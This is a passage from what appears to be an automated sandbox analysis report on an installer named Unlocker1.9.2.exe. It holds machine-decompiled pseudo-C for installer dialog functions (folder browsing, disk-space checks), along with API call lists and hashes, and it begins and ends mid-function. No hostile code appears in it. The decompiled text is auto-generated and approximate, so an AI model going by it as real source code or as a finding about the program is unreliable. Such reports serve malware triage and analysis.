                                                                                                                                                              								_v60 = _t268;
                                                                                                                                                              								_t269 =  *_t311;
                                                                                                                                                              								_t302 = 0x20;
                                                                                                                                                              								_v84 = _t288;
                                                                                                                                                              								_v80 = 0xffff0002;
                                                                                                                                                              								_v76 = 0xd;
                                                                                                                                                              								_v64 = _t302;
                                                                                                                                                              								_v40 = _t318;
                                                                                                                                                              								_v68 = _t269 & _t302;
                                                                                                                                                              								if((_t269 & 0x00000002) == 0) {
                                                                                                                                                              									__eflags = _t269 & 0x00000004;
                                                                                                                                                              									if((_t269 & 0x00000004) == 0) {
                                                                                                                                                              										_t271 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
                                                                                                                                                              										 *( *0x42046c + _t318 * 4) = _t271;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_v76 = 0x4d;
                                                                                                                                                              									_v44 = 1;
                                                                                                                                                              									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                                                              									_v28 = 1;
                                                                                                                                                              									 *( *0x42046c + _t318 * 4) = _t274;
                                                                                                                                                              									_t288 =  *( *0x42046c + _t318 * 4);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_t318 = _t318 + 1;
                                                                                                                                                              							_t311 = _v24 + 0x418;
                                                                                                                                                              							_t331 = _t318 -  *0x423eac; // 0x7
                                                                                                                                                              							_v24 = _t311;
                                                                                                                                                              						} while (_t331 < 0);
                                                                                                                                                              						if(_v28 != 0) {
                                                                                                                                                              							L20:
                                                                                                                                                              							if(_v16 != 0) {
                                                                                                                                                              								E00403DC4(_v8);
                                                                                                                                                              								_t280 = _v32;
                                                                                                                                                              								_t315 = 0;
                                                                                                                                                              								__eflags = 0;
                                                                                                                                                              								goto L23;
                                                                                                                                                              							} else {
                                                                                                                                                              								ShowWindow(_v12, 5);
                                                                                                                                                              								E00403DC4(_v12);
                                                                                                                                                              								L89:
                                                                                                                                                              								return E00403DF6(_a8, _a12, _a16);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						goto L19;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}








































































                                                                                                                                                              0x00404bf9
                                                                                                                                                              0x00404be9
                                                                                                                                                              0x00404beb
                                                                                                                                                              0x00404beb
                                                                                                                                                              0x00404c18
                                                                                                                                                              0x00404c18
                                                                                                                                                              0x00404c19
                                                                                                                                                              0x00404c25
                                                                                                                                                              0x00404c34
                                                                                                                                                              0x00404c34
                                                                                                                                                              0x00404c36
                                                                                                                                                              0x00404c39
                                                                                                                                                              0x00404c42
                                                                                                                                                              0x00404c42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404bb5
                                                                                                                                                              0x00404b49
                                                                                                                                                              0x00404b54
                                                                                                                                                              0x00404b57
                                                                                                                                                              0x00404b5c
                                                                                                                                                              0x00404b5e
                                                                                                                                                              0x00404b60
                                                                                                                                                              0x00404b62
                                                                                                                                                              0x00404b72
                                                                                                                                                              0x00404b7c
                                                                                                                                                              0x00404b7e
                                                                                                                                                              0x00404b81
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404b64
                                                                                                                                                              0x00404b64
                                                                                                                                                              0x00404b64
                                                                                                                                                              0x00404b67
                                                                                                                                                              0x00404b6a
                                                                                                                                                              0x00404b6c
                                                                                                                                                              0x00404b6c
                                                                                                                                                              0x00404b6c
                                                                                                                                                              0x00404b6d
                                                                                                                                                              0x00404b6e
                                                                                                                                                              0x00404b6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404b64
                                                                                                                                                              0x00404b47
                                                                                                                                                              0x00404b2b
                                                                                                                                                              0x00404a62
                                                                                                                                                              0x00404a68
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404a74
                                                                                                                                                              0x00404a78
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404a88
                                                                                                                                                              0x00404a8a
                                                                                                                                                              0x00404a8d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404a9f
                                                                                                                                                              0x00404aa1
                                                                                                                                                              0x00404aa4
                                                                                                                                                              0x00404aae
                                                                                                                                                              0x00404ab0
                                                                                                                                                              0x00404ab1
                                                                                                                                                              0x00404ab2
                                                                                                                                                              0x00404ac1
                                                                                                                                                              0x00404ac3
                                                                                                                                                              0x00404aca
                                                                                                                                                              0x00404acd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404acd
                                                                                                                                                              0x00404aa6
                                                                                                                                                              0x00404aa9
                                                                                                                                                              0x00404aac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404aac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040496c
                                                                                                                                                              0x0040471e
                                                                                                                                                              0x00404723
                                                                                                                                                              0x00404728
                                                                                                                                                              0x0040472d
                                                                                                                                                              0x0040472e
                                                                                                                                                              0x00404737
                                                                                                                                                              0x00404742
                                                                                                                                                              0x0040474d
                                                                                                                                                              0x00404753
                                                                                                                                                              0x00404761
                                                                                                                                                              0x00404776
                                                                                                                                                              0x0040477b
                                                                                                                                                              0x00404786
                                                                                                                                                              0x0040478f
                                                                                                                                                              0x004047a4
                                                                                                                                                              0x004047b5
                                                                                                                                                              0x004047c2
                                                                                                                                                              0x004047c2
                                                                                                                                                              0x004047c7
                                                                                                                                                              0x004047cd
                                                                                                                                                              0x004047cf
                                                                                                                                                              0x004047d2
                                                                                                                                                              0x004047d7
                                                                                                                                                              0x004047dc
                                                                                                                                                              0x004047de
                                                                                                                                                              0x004047de
                                                                                                                                                              0x004047f2
                                                                                                                                                              0x004047fe
                                                                                                                                                              0x004047fe
                                                                                                                                                              0x00404800
                                                                                                                                                              0x00404801
                                                                                                                                                              0x00404806
                                                                                                                                                              0x00404809
                                                                                                                                                              0x0040480c
                                                                                                                                                              0x00404810
                                                                                                                                                              0x00404815
                                                                                                                                                              0x0040481a
                                                                                                                                                              0x0040481e
                                                                                                                                                              0x00404823
                                                                                                                                                              0x00404828
                                                                                                                                                              0x0040482a
                                                                                                                                                              0x0040482c
                                                                                                                                                              0x00404832
                                                                                                                                                              0x004048fc
                                                                                                                                                              0x0040490f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404838
                                                                                                                                                              0x0040483b
                                                                                                                                                              0x0040483e
                                                                                                                                                              0x00404841
                                                                                                                                                              0x00404841
                                                                                                                                                              0x00404847
                                                                                                                                                              0x0040484d
                                                                                                                                                              0x00404850
                                                                                                                                                              0x00404856
                                                                                                                                                              0x00404857
                                                                                                                                                              0x0040485c
                                                                                                                                                              0x00404865
                                                                                                                                                              0x0040486c
                                                                                                                                                              0x0040486f
                                                                                                                                                              0x00404872
                                                                                                                                                              0x00404875
                                                                                                                                                              0x004048af
                                                                                                                                                              0x004048b1
                                                                                                                                                              0x004048d2
                                                                                                                                                              0x004048da
                                                                                                                                                              0x004048b3
                                                                                                                                                              0x004048c0
                                                                                                                                                              0x004048c0
                                                                                                                                                              0x00404877
                                                                                                                                                              0x0040487a
                                                                                                                                                              0x00404889
                                                                                                                                                              0x00404893
                                                                                                                                                              0x0040489b
                                                                                                                                                              0x004048a2
                                                                                                                                                              0x004048aa
                                                                                                                                                              0x004048aa
                                                                                                                                                              0x00404875
                                                                                                                                                              0x004048e0
                                                                                                                                                              0x004048e1
                                                                                                                                                              0x004048e7
                                                                                                                                                              0x004048ed
                                                                                                                                                              0x004048ed
                                                                                                                                                              0x004048fa
                                                                                                                                                              0x00404915

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 004046E1
                                                                                                                                                              • GetDlgItem.USER32 ref: 004046EE
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000007), ref: 0040473A
                                                                                                                                                              • LoadBitmapA.USER32 ref: 0040474D
                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404767
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004047C7
                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                                                                                                                                              • GetWindowLongA.USER32 ref: 00404901
                                                                                                                                                              • SetWindowLongA.USER32 ref: 0040490F
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404920
                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00404B0C
                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                                                                                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CAD
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404CB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                              • Opcode ID: 6f88420c93d77387f0f24d9c6c19e635542aef09cd36cac9f532a381c639e13e
                                                                                                                                                              • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                                                                                              • Opcode Fuzzy Hash: 6f88420c93d77387f0f24d9c6c19e635542aef09cd36cac9f532a381c639e13e
                                                                                                                                                              • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              [Figure: control-flow graph starting at 4041cd; nodes are marked as executed or not executed]
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004041CD(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				long _v20;
                                                                                                                                                              				union _ULARGE_INTEGER _v24;
                                                                                                                                                              				long _v28;
                                                                                                                                                              				union _ULARGE_INTEGER _v32;
                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                              				long _v40;
                                                                                                                                                              				union _ULARGE_INTEGER _v44;
                                                                                                                                                              				CHAR* _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				CHAR* _v68;
                                                                                                                                                              				void _v72;
                                                                                                                                                              				char _v76;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                              				long _t86;
                                                                                                                                                              				signed char* _t88;
                                                                                                                                                              				void* _t94;
                                                                                                                                                              				signed int _t95;
                                                                                                                                                              				signed short _t113;
                                                                                                                                                              				signed int _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                              				signed int* _t145;
                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                              				signed int _t148;
                                                                                                                                                              				signed int _t153;
                                                                                                                                                              				struct HWND__* _t159;
                                                                                                                                                              				CHAR* _t162;
                                                                                                                                                              				int _t163;
                                                                                                                                                              
                                                                                                                                                              				_t81 =  *0x41fc48; // 0x73f11c
                                                                                                                                                              				_v36 = _t81;
                                                                                                                                                              				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                                                                                                                                                              				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                                                                                              				if(_a8 == 0x40b) {
                                                                                                                                                              					E00405282(0x3fb, _t162);
                                                                                                                                                              					E00405C3F(_t162);
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                              					L8:
                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                              						L20:
                                                                                                                                                              						if(_a8 == 0x40f) {
                                                                                                                                                              							L22:
                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                              							E00405282(0x3fb, _t162);
                                                                                                                                                              							if(E004055B1(_t180, _t162) == 0) {
                                                                                                                                                              								_v8 = 1;
                                                                                                                                                              							}
                                                                                                                                                              							E004059DD(0x41f440, _t162);
                                                                                                                                                              							_t145 = 0;
                                                                                                                                                              							_t86 = E00405CFF(0);
                                                                                                                                                              							_v16 = _t86;
                                                                                                                                                              							if(_t86 == 0) {
                                                                                                                                                              								L31:
                                                                                                                                                              								E004059DD(0x41f440, _t162);
                                                                                                                                                              								_t88 = E00405564(0x41f440);
                                                                                                                                                              								if(_t88 != _t145) {
                                                                                                                                                              									 *_t88 =  *_t88 & 0x00000000;
                                                                                                                                                              								}
                                                                                                                                                              								if(GetDiskFreeSpaceA(0x41f440,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                                                                                              									_t153 = _a8;
                                                                                                                                                              									goto L37;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t163 = 0x400;
                                                                                                                                                              									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                                                                                              									_v12 = 1;
                                                                                                                                                              									goto L38;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								if(0 == 0x41f440) {
                                                                                                                                                              									L30:
                                                                                                                                                              									_t145 = 0;
                                                                                                                                                              									goto L31;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L26;
                                                                                                                                                              								}
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L26:
                                                                                                                                                              									_t113 = GetDiskFreeSpaceExA(0x41f440,  &_v44,  &_v24,  &_v32);
                                                                                                                                                              									if(_t113 != 0) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									if(_t145 != 0) {
                                                                                                                                                              										 *_t145 =  *_t145 & _t113;
                                                                                                                                                              									}
                                                                                                                                                              									_t145 = E00405517(0x41f440) - 1;
                                                                                                                                                              									 *_t145 = 0x5c;
                                                                                                                                                              									if(_t145 != 0x41f440) {
                                                                                                                                                              										continue;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L30;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t153 = (_v40 << 0x00000020 | _v44.LowPart) >> 0xa;
                                                                                                                                                              								_v12 = 1;
                                                                                                                                                              								_t145 = 0;
                                                                                                                                                              								L37:
                                                                                                                                                              								_t163 = 0x400;
                                                                                                                                                              								L38:
                                                                                                                                                              								_t94 = E0040461D(5);
                                                                                                                                                              								if(_v12 != _t145 && _t153 < _t94) {
                                                                                                                                                              									_v8 = 2;
                                                                                                                                                              								}
                                                                                                                                                              								_t147 =  *0x42365c; // 0x7664ab
                                                                                                                                                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                                                                                                                                              									E00404568(0x3ff, 0xfffffffb, _t94); // executed
                                                                                                                                                              									if(_v12 == _t145) {
                                                                                                                                                              										SetDlgItemTextA(_a4, _t163, 0x41f430);
                                                                                                                                                              									} else {
                                                                                                                                                              										E00404568(_t163, 0xfffffffc, _t153); // executed
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t95 = _v8;
                                                                                                                                                              								 *0x423f24 = _t95;
                                                                                                                                                              								if(_t95 == _t145) {
                                                                                                                                                              									_v8 = E0040140B(7);
                                                                                                                                                              								}
                                                                                                                                                              								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                                                                                                                              									_v8 = _t145;
                                                                                                                                                              								}
                                                                                                                                                              								E00403DB1(0 | _v8 == _t145);
                                                                                                                                                              								if(_v8 == _t145 &&  *0x420464 == _t145) {
                                                                                                                                                              									E00404162();
                                                                                                                                                              								}
                                                                                                                                                              								 *0x420464 = _t145;
                                                                                                                                                              								goto L53;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t180 = _a8 - 0x405;
                                                                                                                                                              						if(_a8 != 0x405) {
                                                                                                                                                              							goto L53;
                                                                                                                                                              						}
                                                                                                                                                              						goto L22;
                                                                                                                                                              					}
                                                                                                                                                              					_t117 = _a12 & 0x0000ffff;
                                                                                                                                                              					if(_t117 != 0x3fb) {
                                                                                                                                                              						L12:
                                                                                                                                                              						if(_t117 == 0x3e9) {
                                                                                                                                                              							_t148 = 7;
                                                                                                                                                              							memset( &_v72, 0, _t148 << 2);
                                                                                                                                                              							_v76 = _a4;
                                                                                                                                                              							_v68 = 0x420478;
                                                                                                                                                              							_v56 = E00404502;
                                                                                                                                                              							_v52 = _t162;
                                                                                                                                                              							_v64 = E004059FF(0x3fb, 0x420478, _t162, 0x41f848, _v8);
                                                                                                                                                              							_t122 =  &_v76;
                                                                                                                                                              							_v60 = 0x41;
                                                                                                                                                              							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                                              							if(_t122 == 0) {
                                                                                                                                                              								_a8 = 0x40f;
                                                                                                                                                              							} else {
                                                                                                                                                              								__imp__CoTaskMemFree(_t122);
                                                                                                                                                              								E004054D0(_t162);
                                                                                                                                                              								_t124 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                                                                                                                              								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Program Files\\Unlocker") {
                                                                                                                                                              									E004059FF(0x3fb, 0x420478, _t162, 0, _t125);
                                                                                                                                                              									if(lstrcmpiA(0x422e20, 0x420478) != 0) {
                                                                                                                                                              										lstrcatA(_t162, 0x422e20);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								 *0x420464 =  &(( *0x420464)[0]);
                                                                                                                                                              								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                              						goto L53;
                                                                                                                                                              					}
                                                                                                                                                              					_a8 = 0x40f;
                                                                                                                                                              					goto L12;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t159 = _a4;
                                                                                                                                                              					_v12 = GetDlgItem(_t159, 0x3fb);
                                                                                                                                                              					if(E0040553D(_t162) != 0 && E00405564(_t162) == 0) {
                                                                                                                                                              						E004054D0(_t162);
                                                                                                                                                              					}
                                                                                                                                                              					 *0x423658 = _t159;
                                                                                                                                                              					SetWindowTextA(_v12, _t162); // executed
                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                              					_push(1);
                                                                                                                                                              					E00403D8F(_t159);
                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                              					_push(0x14);
                                                                                                                                                              					E00403D8F(_t159);
                                                                                                                                                              					E00403DC4(_v12);
                                                                                                                                                              					if(E00405CFF(7) == 0) {
                                                                                                                                                              						L53:
                                                                                                                                                              						return E00403DF6(_a8, _a12, _a16);
                                                                                                                                                              					}
                                                                                                                                                              					SHAutoComplete(_v12, 1); // executed
                                                                                                                                                              					goto L8;
                                                                                                                                                              				}
                                                                                                                                                              			}







































                                                                                                                                                              0x00404470
                                                                                                                                                              0x00404479
                                                                                                                                                              0x00404483
                                                                                                                                                              0x0040448b
                                                                                                                                                              0x004044a1
                                                                                                                                                              0x0040448d
                                                                                                                                                              0x00404491
                                                                                                                                                              0x00404491
                                                                                                                                                              0x0040448b
                                                                                                                                                              0x004044a6
                                                                                                                                                              0x004044ab
                                                                                                                                                              0x004044b0
                                                                                                                                                              0x004044b9
                                                                                                                                                              0x004044b9
                                                                                                                                                              0x004044c2
                                                                                                                                                              0x004044c4
                                                                                                                                                              0x004044c4
                                                                                                                                                              0x004044d0
                                                                                                                                                              0x004044d8
                                                                                                                                                              0x004044e2
                                                                                                                                                              0x004044e2
                                                                                                                                                              0x004044e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004044e7
                                                                                                                                                              0x004043b1
                                                                                                                                                              0x0040436b
                                                                                                                                                              0x00404372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404372
                                                                                                                                                              0x00404293
                                                                                                                                                              0x00404299
                                                                                                                                                              0x004042b3
                                                                                                                                                              0x004042b8
                                                                                                                                                              0x004042c2
                                                                                                                                                              0x004042c9
                                                                                                                                                              0x004042d8
                                                                                                                                                              0x004042db
                                                                                                                                                              0x004042de
                                                                                                                                                              0x004042e5
                                                                                                                                                              0x004042ed
                                                                                                                                                              0x004042f0
                                                                                                                                                              0x004042f4
                                                                                                                                                              0x004042fb
                                                                                                                                                              0x00404303
                                                                                                                                                              0x0040435b
                                                                                                                                                              0x00404305
                                                                                                                                                              0x00404306
                                                                                                                                                              0x0040430d
                                                                                                                                                              0x00404312
                                                                                                                                                              0x00404317
                                                                                                                                                              0x0040431f
                                                                                                                                                              0x0040432c
                                                                                                                                                              0x00404340
                                                                                                                                                              0x00404344
                                                                                                                                                              0x00404344
                                                                                                                                                              0x00404340
                                                                                                                                                              0x00404349
                                                                                                                                                              0x00404354
                                                                                                                                                              0x00404354
                                                                                                                                                              0x00404303
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042b8
                                                                                                                                                              0x004042a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042ac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404214
                                                                                                                                                              0x00404214
                                                                                                                                                              0x00404220
                                                                                                                                                              0x0040422a
                                                                                                                                                              0x00404237
                                                                                                                                                              0x00404237
                                                                                                                                                              0x0040423d
                                                                                                                                                              0x00404246
                                                                                                                                                              0x0040424f
                                                                                                                                                              0x00404252
                                                                                                                                                              0x00404255
                                                                                                                                                              0x0040425d
                                                                                                                                                              0x00404260
                                                                                                                                                              0x00404263
                                                                                                                                                              0x0040426b
                                                                                                                                                              0x00404279
                                                                                                                                                              0x004044ed
                                                                                                                                                              0x004044ff
                                                                                                                                                              0x004044ff
                                                                                                                                                              0x00404284
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404284

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404219
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000001,00000007,?,?,00000014,?,?,00000001,?), ref: 00404284
                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                                                                                              • lstrcmpiA.KERNEL32(Remove folder: ,00420478,00000000,?,?), ref: 00404338
                                                                                                                                                              • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404344
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404354
                                                                                                                                                                • Part of subcall function 00405282: GetDlgItemTextA.USER32 ref: 00405295
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              • GetDiskFreeSpaceExA.KERNELBASE(C:\Program Files\,?,?,?,00000000,C:\Program Files\,?,?,000003FB,?), ref: 004043C6
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000000,C:\Program Files\,?,?,000003FB,?), ref: 0040440D
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 004044A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpi
                                                                                                                                                              • String ID: A$C:\Program Files\$C:\Program Files\Unlocker$Remove folder:
                                                                                                                                                              • API String ID: 936030579-772531688
                                                                                                                                                              • Opcode ID: f620154ea62ad6bd0c942c410229765c9d88c2cad30687c3b8eb4897cd28c5b9
                                                                                                                                                              • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                                                                                                                                              • Opcode Fuzzy Hash: f620154ea62ad6bd0c942c410229765c9d88c2cad30687c3b8eb4897cd28c5b9
                                                                                                                                                              • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 004059FF; nodes are marked as Executed or Not Executed.]
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E004059FF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				struct _ITEMIDLIST* _v12;
                                                                                                                                                              				signed int _v16;
